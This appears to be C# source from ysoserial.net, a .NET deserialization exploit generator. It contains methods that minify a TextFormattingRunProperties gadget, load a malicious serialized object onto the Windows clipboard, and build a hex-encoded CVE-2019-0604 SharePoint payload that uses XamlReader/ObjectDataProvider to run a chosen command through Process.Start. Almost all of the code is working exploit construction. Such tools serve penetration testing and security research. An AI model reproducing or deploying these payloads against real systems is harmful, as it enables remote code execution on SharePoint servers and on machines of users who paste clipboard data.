private void TextFormatterMinifying()
{
string myApp = "TestConsoleApp_YSONET";
sampleInputArgs = new InputArgs(myApp + " /foo bar", true, false, true, true, true, null);
bool isErrOk = false;
TextFormattingRunPropertiesGenerator generator = new TextFormattingRunPropertiesGenerator();
byte[] tcd_bf_byte = (byte[])generator.GenerateWithNoTest("binaryformatter", sampleInputArgs);
Console.WriteLine("Init size: " + tcd_bf_byte.Length);
string json_string = AdvancedBinaryFormatterParser.StreamToJson(new MemoryStream(tcd_bf_byte), false, true, true);
string result = BinaryFormatterMinifier.MinimiseJsonAndRun(json_string, sampleInputArgs, isErrOk, true);
Console.WriteLine(result);
MemoryStream ms = AdvancedBinaryFormatterParser.JsonToStream(result);
Console.WriteLine("Final size: " + ms.Length);
Console.ReadLine();
}
public object Run(string[] args)
{
// to solve this error: Current thread must be set to single thread apartment (STA) mode before OLE calls can be made
// we cannot use the [STAThread] outside of this plugin
// here is a solution
var staThread = new Thread(delegate()
{
InputArgs inputArgs = new InputArgs();
List <string> extra;
try
{
extra = options.Parse(args);
inputArgs.Cmd = command;
inputArgs.Minify = minify;
inputArgs.UseSimpleType = useSimpleType;
inputArgs.Test = test;
}
catch (OptionException e)
{
Console.Write("ysoserial: ");
Console.WriteLine(e.Message);
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
object payload = "";
if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
{
Console.Write("ysoserial: ");
Console.WriteLine("Incorrect plugin mode/arguments combination");
Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
System.Environment.Exit(-1);
}
// Creates a new data object.
System.Windows.Forms.DataObject myDataObject = new System.Windows.Forms.DataObject();
myDataObject.SetData(format, false, new AxHostStateMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs))); // for System.Windows.Forms
/*
* myDataObject.SetData(format, new DataSetMarshal(TextFormattingRunPropertiesGenerator.TextFormattingRunPropertiesGadget(inputArgs)), false); // for System.Windows
*/
Clipboard.Clear();
Clipboard.SetDataObject(myDataObject, true);
if (test)
{
// PoC on how it works in practice
try
{
IDataObject dataObj = Clipboard.GetDataObject();
Object test = dataObj.GetData(format);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
});
staThread.SetApartmentState(ApartmentState.STA);
staThread.Start();
staThread.Join();
return("Object copied to the clipboard");
}
public string CVE_2019_0604()
{
/*
* string payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:xsd=""http://www.w3.org/2001/XMLSchema"">
* <ExpandedElement/>
* <ProjectedProperty0>
* <MethodName>Parse</MethodName>
* <MethodParameters>
* <anyType xsi:type=""xsd:string"">
* <![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">"+ cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]>
* </anyType>
* </MethodParameters>
* <ObjectInstance xsi:type=""XamlReader""></ObjectInstance>
* </ProjectedProperty0>
* </ExpandedWrapperOfXamlReaderObjectDataProvider>";
* //*/
string payloadPart1 = "";
string payloadPart2 = "";
if (useurl)
{
InputArgs inputArgs = new InputArgs();
inputArgs.Cmd = "foobar";
inputArgs.IsRawCmd = true;
inputArgs.ExtraInternalArguments = new List <String> {
"--variant", "3", "--xamlurl", cmd
};
inputArgs.Minify = true;
inputArgs.UseSimpleType = true;
payloadPart1 = typeof(Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties).AssemblyQualifiedName + ":";
payloadPart1 = payloadPart1.Replace(" ", "");
TextFormattingRunPropertiesGenerator myTFRPG = new TextFormattingRunPropertiesGenerator();
payloadPart2 = (string)myTFRPG.GenerateWithNoTest("DataContractSerializer", inputArgs);
}
else
{
payloadPart1 = @"System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35]],System.Data.Services,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089:";
Boolean hasArgs;
string[] splittedCMD = CommandArgSplitter.SplitCommand(cmd, CommandArgSplitter.CommandType.XML, out hasArgs);
String cmdPart;
if (hasArgs)
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String><b:String>{splittedCMD[1]}</b:String>";
}
else
{
cmdPart = $@"<ObjectDataProvider.MethodParameters><b:String>{splittedCMD[0]}</b:String>";
}
payloadPart2 = @"<ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:a=""http://www.w3.org/2001/XMLSchema-instance"" xmlns:b=""http://www.w3.org/2001/XMLSchema""><ExpandedElement/><ProjectedProperty0><MethodName>Parse</MethodName><MethodParameters><anyType a:type=""b:string""><![CDATA[<ResourceDictionary xmlns=""http://schemas.microsoft.com/winfx/2006/xaml/presentation"" xmlns:d=""http://schemas.microsoft.com/winfx/2006/xaml"" xmlns:b=""clr-namespace:System;assembly=mscorlib"" xmlns:c=""clr-namespace:System.Diagnostics;assembly=system""><ObjectDataProvider d:Key="""" ObjectType=""{{d:Type c:Process}}"" MethodName=""Start"">" + cmdPart + @"</ObjectDataProvider.MethodParameters></ObjectDataProvider></ResourceDictionary>]]></anyType></MethodParameters><ObjectInstance a:type=""XamlReader""/></ProjectedProperty0></ExpandedWrapperOfXamlReaderObjectDataProvider>";
}
//payloadPart2 = PayloadMinifier(payloadPart2); // we need to make it smaller as goes bigger after encoding
payloadPart2 = XMLMinifier.Minify(payloadPart2, null, null, FormatterType.DataContractXML, true);
//Console.WriteLine(payloadPart2);
string payload = payloadPart1 + payloadPart2;
Console.WriteLine(payload);
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append("__bp");
HexEncode(checked ((char)(payload.Length << 2)), stringBuilder);
HexEncode(payload, stringBuilder);
return(stringBuilder.ToString());
}
